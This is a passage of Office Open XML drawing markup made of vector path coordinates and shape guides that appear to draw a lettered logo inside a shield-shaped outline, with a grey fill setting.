                    <a:pt x="195167" y="134829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195167" y="152109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188070" y="152109"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="272651" y="110148"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="280853" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291557" y="128943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302086" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310026" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294902" y="135645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294902" y="152109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287834" y="152109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287834" y="135645"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="239842" y="110148"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="272592" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272592" y="116500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259737" y="116500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259737" y="152109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252640" y="152109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252640" y="116500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239842" y="116500"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="227946" y="110148"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="235014" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235014" y="152080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227946" y="152080"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146738" y="110148"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153806" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153806" y="134596"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153806" y="140220"/>
                    <a:pt x="154126" y="146748"/>
                    <a:pt x="163317" y="146748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172508" y="146748"/>
                    <a:pt x="172828" y="140220"/>
                    <a:pt x="172828" y="134596"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172828" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179925" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179925" y="137015"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179925" y="147739"/>
                    <a:pt x="173293" y="153100"/>
                    <a:pt x="163317" y="153100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153340" y="153100"/>
                    <a:pt x="146738" y="147739"/>
                    <a:pt x="146738" y="136957"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="70591" y="110148"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="99706" y="110148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99706" y="116500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77659" y="116500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77659" y="127486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98078" y="127486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98078" y="133489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77659" y="133489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77659" y="145757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100113" y="145757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100113" y="152109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70591" y="152109"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="123499" y="109157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132632" y="109215"/>
                    <a:pt x="139816" y="114431"/>
                    <a:pt x="140660" y="123494"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="133592" y="123494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="132852" y="118537"/>
                    <a:pt x="128497" y="114941"/>
                    <a:pt x="123499" y="115160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114831" y="115160"/>
                    <a:pt x="111196" y="123086"/>
                    <a:pt x="111196" y="131129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111196" y="139171"/>
                    <a:pt x="114774" y="147097"/>
                    <a:pt x="123499" y="147097"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129782" y="147097"/>
                    <a:pt x="133243" y="142231"/>
                    <a:pt x="133796" y="136112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="140718" y="136112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="140719" y="136278"/>
                    <a:pt x="140718" y="136445"/>
                    <a:pt x="140714" y="136612"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140505" y="145927"/>
                    <a:pt x="132798" y="153310"/>
                    <a:pt x="123499" y="153100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111371" y="153100"/>
                    <a:pt x="104128" y="143105"/>
                    <a:pt x="104128" y="131129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104128" y="119152"/>
                    <a:pt x="111371" y="109157"/>
                    <a:pt x="123499" y="109157"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="47788" y="109157"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56223" y="109157"/>
                    <a:pt x="63320" y="113819"/>
                    <a:pt x="63320" y="122561"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56223" y="122561"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55903" y="117141"/>
                    <a:pt x="52384" y="115160"/>
                    <a:pt x="47497" y="115160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44210" y="115160"/>
                    <a:pt x="40080" y="116384"/>
                    <a:pt x="40080" y="120609"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40080" y="123552"/>
                    <a:pt x="42000" y="125184"/>
                    <a:pt x="44909" y="126029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45490" y="126321"/>
                    <a:pt x="54449" y="128593"/>
                    <a:pt x="56543" y="129235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61246" y="130655"/>
                    <a:pt x="64454" y="135008"/>
                    <a:pt x="64425" y="139929"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64425" y="149341"/>
                    <a:pt x="56368" y="153100"/>
                    <a:pt x="48341" y="153100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39092" y="153100"/>
                    <a:pt x="31617" y="148525"/>
                    <a:pt x="31442" y="138122"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38568" y="138122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="38568" y="144591"/>
                    <a:pt x="43164" y="147097"/>
                    <a:pt x="48806" y="147097"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55031" y="147097"/>
                    <a:pt x="57357" y="143921"/>
                    <a:pt x="57357" y="140774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57575" y="138478"/>
                    <a:pt x="56191" y="136332"/>
                    <a:pt x="54012" y="135587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51191" y="134480"/>
                    <a:pt x="47497" y="133722"/>
                    <a:pt x="41971" y="132119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35049" y="130225"/>
                    <a:pt x="33013" y="125825"/>
                    <a:pt x="33013" y="121483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33013" y="113091"/>
                    <a:pt x="40488" y="109157"/>
                    <a:pt x="47788" y="109157"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="159042" y="68245"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="159042" y="88323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177424" y="88323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178079" y="88390"/>
                    <a:pt x="178739" y="88386"/>
                    <a:pt x="179392" y="88311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184420" y="87738"/>
                    <a:pt x="188031" y="83190"/>
                    <a:pt x="187459" y="78153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187519" y="77529"/>
                    <a:pt x="187514" y="76901"/>
                    <a:pt x="187445" y="76278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186892" y="71287"/>
                    <a:pt x="182406" y="67691"/>
                    <a:pt x="177424" y="68245"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="270499" y="42428"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="270499" y="62505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287659" y="62505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="294262" y="62505"/>
                    <a:pt x="297868" y="58979"/>
                    <a:pt x="297868" y="52219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297868" y="44030"/>
                    <a:pt x="292924" y="42428"/>
                    <a:pt x="287485" y="42428"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="159042" y="42427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="159042" y="60086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176086" y="60086"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="176468" y="60109"/>
                    <a:pt x="176851" y="60105"/>
                    <a:pt x="177232" y="60075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181780" y="59713"/>
                    <a:pt x="185174" y="55725"/>
                    <a:pt x="184812" y="51169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184812" y="44758"/>
                    <a:pt x="181904" y="42427"/>
                    <a:pt x="176086" y="42427"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="207470" y="33248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="250459" y="33248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250459" y="42952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217912" y="42952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217912" y="59794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248045" y="59794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248045" y="68974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217912" y="68974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217912" y="87798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251041" y="87798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251041" y="97502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207470" y="97502"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148513" y="33248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="177599" y="33248"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188302" y="33248"/>
                    <a:pt x="195341" y="38464"/>
                    <a:pt x="195341" y="49158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195616" y="55062"/>
                    <a:pt x="192209" y="60519"/>
                    <a:pt x="186790" y="62854"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="186790" y="63029"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194091" y="64748"/>
                    <a:pt x="198017" y="70868"/>
                    <a:pt x="198017" y="79610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198017" y="89692"/>
                    <a:pt x="191473" y="97502"/>
                    <a:pt x="175941" y="97502"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148513" y="97502"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="87520" y="33248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="99649" y="33248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115443" y="62038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131004" y="33248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142726" y="33248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120388" y="72296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120388" y="97502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109945" y="97502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109945" y="72296"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="260173" y="33132"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="288677" y="33132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="301737" y="33132"/>
                    <a:pt x="308426" y="39718"/>
                    <a:pt x="308426" y="50616"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308426" y="62942"/>
                    <a:pt x="300486" y="66089"/>
                    <a:pt x="298566" y="66818"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="298566" y="66993"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="302028" y="67546"/>
                    <a:pt x="307292" y="70402"/>
                    <a:pt x="307292" y="80601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307292" y="88061"/>
                    <a:pt x="308310" y="94909"/>
                    <a:pt x="310579" y="97502"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="299352" y="97502"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="298041" y="94539"/>
                    <a:pt x="297501" y="91291"/>
                    <a:pt x="297781" y="88061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297781" y="76259"/>
                    <a:pt x="295513" y="71043"/>
                    <a:pt x="285885" y="71043"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="270499" y="71043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270499" y="97502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260173" y="97502"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="59394" y="31617"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72861" y="31704"/>
                    <a:pt x="83506" y="39718"/>
                    <a:pt x="84757" y="53588"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74286" y="53588"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72541" y="46216"/>
                    <a:pt x="68120" y="40796"/>
                    <a:pt x="59394" y="40796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46538" y="40796"/>
                    <a:pt x="41244" y="53035"/>
                    <a:pt x="41244" y="65390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41244" y="77745"/>
                    <a:pt x="46596" y="89896"/>
                    <a:pt x="59394" y="89896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68818" y="89896"/>
                    <a:pt x="73791" y="82408"/>
                    <a:pt x="74635" y="73053"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84844" y="73053"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="84001" y="88439"/>
                    <a:pt x="73937" y="99075"/>
                    <a:pt x="59394" y="99075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41506" y="99075"/>
                    <a:pt x="30802" y="83631"/>
                    <a:pt x="30802" y="65273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30802" y="46915"/>
                    <a:pt x="41506" y="31617"/>
                    <a:pt x="59394" y="31617"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3345" y="3351"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3345" y="164377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338153" y="164377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338153" y="3351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="341498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341498" y="401021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207528" y="430977"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="183291" y="436338"/>
                    <a:pt x="158178" y="436338"/>
                    <a:pt x="133940" y="430977"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="401021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="7F807F"/>
            </a:solidFill>
            <a:ln w="94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 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{675B93E4-A295-AC49-B38E-0D26C07F5B8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8589" y="333849"/>
              <a:ext cx="390791" cy="356698"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 7630 w 466529"/>
                <a:gd name="connsiteY0" fmla="*/ 416890 h 432780"/>
                <a:gd name="connsiteX1" fmla="*/ 7630 w 466529"/>
                <a:gd name="connsiteY1" fmla="*/ 425003 h 432780"/>
                <a:gd name="connsiteX2" fmla="*/ 16948 w 466529"/>
                <a:gd name="connsiteY2" fmla="*/ 425003 h 432780"/>
                <a:gd name="connsiteX3" fmla="*/ 22484 w 466529"/>
                <a:gd name="connsiteY3" fmla="*/ 420997 h 432780"/>
                <a:gd name="connsiteX4" fmla="*/ 22653 w 466529"/>
                <a:gd name="connsiteY4" fmla="*/ 420896 h 432780"/>
                <a:gd name="connsiteX5" fmla="*/ 16880 w 466529"/>
                <a:gd name="connsiteY5" fmla="*/ 416890 h 432780"/>
                <a:gd name="connsiteX6" fmla="*/ 417915 w 466529"/>
                <a:gd name="connsiteY6" fmla="*/ 410326 h 432780"/>
                <a:gd name="connsiteX7" fmla="*/ 417386 w 466529"/>
                <a:gd name="connsiteY7" fmla="*/ 410349 h 432780"/>
                <a:gd name="connsiteX8" fmla="*/ 410826 w 466529"/>
                <a:gd name="connsiteY8" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX9" fmla="*/ 410818 w 466529"/>
                <a:gd name="connsiteY9" fmla="*/ 418218 h 432780"/>
                <a:gd name="connsiteX10" fmla="*/ 418016 w 466529"/>
                <a:gd name="connsiteY10" fmla="*/ 425844 h 432780"/>
                <a:gd name="connsiteX11" fmla="*/ 418583 w 466529"/>
                <a:gd name="connsiteY11" fmla="*/ 425818 h 432780"/>
                <a:gd name="connsiteX12" fmla="*/ 425072 w 466529"/>
                <a:gd name="connsiteY12" fmla="*/ 418136 h 432780"/>
                <a:gd name="connsiteX13" fmla="*/ 425082 w 466529"/>
                <a:gd name="connsiteY13" fmla="*/ 417917 h 432780"/>
                <a:gd name="connsiteX14" fmla="*/ 417915 w 466529"/>
                <a:gd name="connsiteY14" fmla="*/ 410326 h 432780"/>
                <a:gd name="connsiteX15" fmla="*/ 300464 w 466529"/>
                <a:gd name="connsiteY15" fmla="*/ 410226 h 432780"/>
                <a:gd name="connsiteX16" fmla="*/ 299887 w 466529"/>
                <a:gd name="connsiteY16" fmla="*/ 410260 h 432780"/>
                <a:gd name="connsiteX17" fmla="*/ 293509 w 466529"/>
                <a:gd name="connsiteY17" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX18" fmla="*/ 293499 w 466529"/>
                <a:gd name="connsiteY18" fmla="*/ 418254 h 432780"/>
                <a:gd name="connsiteX19" fmla="*/ 300666 w 466529"/>
                <a:gd name="connsiteY19" fmla="*/ 425845 h 432780"/>
                <a:gd name="connsiteX20" fmla="*/ 301196 w 466529"/>
                <a:gd name="connsiteY20" fmla="*/ 425822 h 432780"/>
                <a:gd name="connsiteX21" fmla="*/ 307756 w 466529"/>
                <a:gd name="connsiteY21" fmla="*/ 418136 h 432780"/>
                <a:gd name="connsiteX22" fmla="*/ 307655 w 466529"/>
                <a:gd name="connsiteY22" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX23" fmla="*/ 307662 w 466529"/>
                <a:gd name="connsiteY23" fmla="*/ 417852 h 432780"/>
                <a:gd name="connsiteX24" fmla="*/ 300464 w 466529"/>
                <a:gd name="connsiteY24" fmla="*/ 410226 h 432780"/>
                <a:gd name="connsiteX25" fmla="*/ 48074 w 466529"/>
                <a:gd name="connsiteY25" fmla="*/ 409754 h 432780"/>
                <a:gd name="connsiteX26" fmla="*/ 42200 w 466529"/>
                <a:gd name="connsiteY26" fmla="*/ 415779 h 432780"/>
                <a:gd name="connsiteX27" fmla="*/ 53847 w 466529"/>
                <a:gd name="connsiteY27" fmla="*/ 415779 h 432780"/>
                <a:gd name="connsiteX28" fmla="*/ 48074 w 466529"/>
                <a:gd name="connsiteY28" fmla="*/ 409754 h 432780"/>
                <a:gd name="connsiteX29" fmla="*/ 336148 w 466529"/>
                <a:gd name="connsiteY29" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX30" fmla="*/ 343879 w 466529"/>
                <a:gd name="connsiteY30" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX31" fmla="*/ 343879 w 466529"/>
                <a:gd name="connsiteY31" fmla="*/ 419617 h 432780"/>
                <a:gd name="connsiteX32" fmla="*/ 348538 w 466529"/>
                <a:gd name="connsiteY32" fmla="*/ 425373 h 432780"/>
                <a:gd name="connsiteX33" fmla="*/ 353400 w 466529"/>
                <a:gd name="connsiteY33" fmla="*/ 419617 h 432780"/>
                <a:gd name="connsiteX34" fmla="*/ 353501 w 466529"/>
                <a:gd name="connsiteY34" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX35" fmla="*/ 361232 w 466529"/>
                <a:gd name="connsiteY35" fmla="*/ 403931 h 432780"/>
                <a:gd name="connsiteX36" fmla="*/ 361232 w 466529"/>
                <a:gd name="connsiteY36" fmla="*/ 432240 h 432780"/>
                <a:gd name="connsiteX37" fmla="*/ 353400 w 466529"/>
                <a:gd name="connsiteY37" fmla="*/ 432240 h 432780"/>
                <a:gd name="connsiteX38" fmla="*/ 353400 w 466529"/>
                <a:gd name="connsiteY38" fmla="*/ 428234 h 432780"/>
                <a:gd name="connsiteX39" fmla="*/ 345398 w 466529"/>
                <a:gd name="connsiteY39" fmla="*/ 432779 h 432780"/>
                <a:gd name="connsiteX40" fmla="*/ 336148 w 466529"/>
                <a:gd name="connsiteY40" fmla="*/ 422277 h 432780"/>
                <a:gd name="connsiteX41" fmla="*/ 389522 w 466529"/>
                <a:gd name="connsiteY41" fmla="*/ 403830 h 432780"/>
                <a:gd name="connsiteX42" fmla="*/ 397254 w 466529"/>
                <a:gd name="connsiteY42" fmla="*/ 403830 h 432780"/>
                <a:gd name="connsiteX43" fmla="*/ 397254 w 466529"/>
                <a:gd name="connsiteY43" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX44" fmla="*/ 389522 w 466529"/>
                <a:gd name="connsiteY44" fmla="*/ 432139 h 432780"/>
                <a:gd name="connsiteX45" fmla="*/ 76365 w 466529"/>
                <a:gd name="connsiteY45" fmla="*/ 403459 h 432780"/>
                <a:gd name="connsiteX46" fmla="*/ 86493 w 466529"/>
                <a:gd name="connsiteY46" fmla="*/ 406825 h 432780"/>
                <a:gd name="connsiteX47" fmla="*/ 83556 w 466529"/>
                <a:gd name="connsiteY47" fmla="*/ 412346 h 432780"/>
                <a:gd name="connsiteX48" fmla="*/ 76163 w 466529"/>
                <a:gd name="connsiteY48" fmla="*/ 409720 h 432780"/>
                <a:gd name="connsiteX49" fmla="*/ 73327 w 466529"/>
                <a:gd name="connsiteY49" fmla="*/ 411673 h 432780"/>
                <a:gd name="connsiteX50" fmla="*/ 78863 w 466529"/>
                <a:gd name="connsiteY50" fmla="*/ 415039 h 432780"/>
                <a:gd name="connsiteX51" fmla="*/ 86831 w 466529"/>
                <a:gd name="connsiteY51" fmla="*/ 423488 h 432780"/>
                <a:gd name="connsiteX52" fmla="*/ 76365 w 466529"/>
                <a:gd name="connsiteY52" fmla="*/ 432644 h 432780"/>
                <a:gd name="connsiteX53" fmla="*/ 64684 w 466529"/>
                <a:gd name="connsiteY53" fmla="*/ 428369 h 432780"/>
                <a:gd name="connsiteX54" fmla="*/ 68060 w 466529"/>
                <a:gd name="connsiteY54" fmla="*/ 423084 h 432780"/>
                <a:gd name="connsiteX55" fmla="*/ 76669 w 466529"/>
                <a:gd name="connsiteY55" fmla="*/ 426450 h 432780"/>
                <a:gd name="connsiteX56" fmla="*/ 80045 w 466529"/>
                <a:gd name="connsiteY56" fmla="*/ 424329 h 432780"/>
                <a:gd name="connsiteX57" fmla="*/ 74407 w 466529"/>
                <a:gd name="connsiteY57" fmla="*/ 420963 h 432780"/>
                <a:gd name="connsiteX58" fmla="*/ 66237 w 466529"/>
                <a:gd name="connsiteY58" fmla="*/ 412447 h 432780"/>
                <a:gd name="connsiteX59" fmla="*/ 66297 w 466529"/>
                <a:gd name="connsiteY59" fmla="*/ 411410 h 432780"/>
                <a:gd name="connsiteX60" fmla="*/ 76365 w 466529"/>
                <a:gd name="connsiteY60" fmla="*/ 403459 h 432780"/>
                <a:gd name="connsiteX61" fmla="*/ 300666 w 466529"/>
                <a:gd name="connsiteY61" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX62" fmla="*/ 301109 w 466529"/>
                <a:gd name="connsiteY62" fmla="*/ 403294 h 432780"/>
                <a:gd name="connsiteX63" fmla="*/ 315284 w 466529"/>
                <a:gd name="connsiteY63" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX64" fmla="*/ 315284 w 466529"/>
                <a:gd name="connsiteY64" fmla="*/ 418476 h 432780"/>
                <a:gd name="connsiteX65" fmla="*/ 300464 w 466529"/>
                <a:gd name="connsiteY65" fmla="*/ 432779 h 432780"/>
                <a:gd name="connsiteX66" fmla="*/ 299986 w 466529"/>
                <a:gd name="connsiteY66" fmla="*/ 432776 h 432780"/>
                <a:gd name="connsiteX67" fmla="*/ 285879 w 466529"/>
                <a:gd name="connsiteY67" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX68" fmla="*/ 285879 w 466529"/>
                <a:gd name="connsiteY68" fmla="*/ 417628 h 432780"/>
                <a:gd name="connsiteX69" fmla="*/ 300666 w 466529"/>
                <a:gd name="connsiteY69" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX70" fmla="*/ 418016 w 466529"/>
                <a:gd name="connsiteY70" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX71" fmla="*/ 418562 w 466529"/>
                <a:gd name="connsiteY71" fmla="*/ 403292 h 432780"/>
                <a:gd name="connsiteX72" fmla="*/ 432736 w 466529"/>
                <a:gd name="connsiteY72" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX73" fmla="*/ 418672 w 466529"/>
                <a:gd name="connsiteY73" fmla="*/ 432057 h 432780"/>
                <a:gd name="connsiteX74" fmla="*/ 403195 w 466529"/>
                <a:gd name="connsiteY74" fmla="*/ 418035 h 432780"/>
                <a:gd name="connsiteX75" fmla="*/ 403196 w 466529"/>
                <a:gd name="connsiteY75" fmla="*/ 417594 h 432780"/>
                <a:gd name="connsiteX76" fmla="*/ 418016 w 466529"/>
                <a:gd name="connsiteY76" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX77" fmla="*/ 454038 w 466529"/>
                <a:gd name="connsiteY77" fmla="*/ 403291 h 432780"/>
                <a:gd name="connsiteX78" fmla="*/ 463289 w 466529"/>
                <a:gd name="connsiteY78" fmla="*/ 413928 h 432780"/>
                <a:gd name="connsiteX79" fmla="*/ 463289 w 466529"/>
                <a:gd name="connsiteY79" fmla="*/ 432240 h 432780"/>
                <a:gd name="connsiteX80" fmla="*/ 455558 w 466529"/>
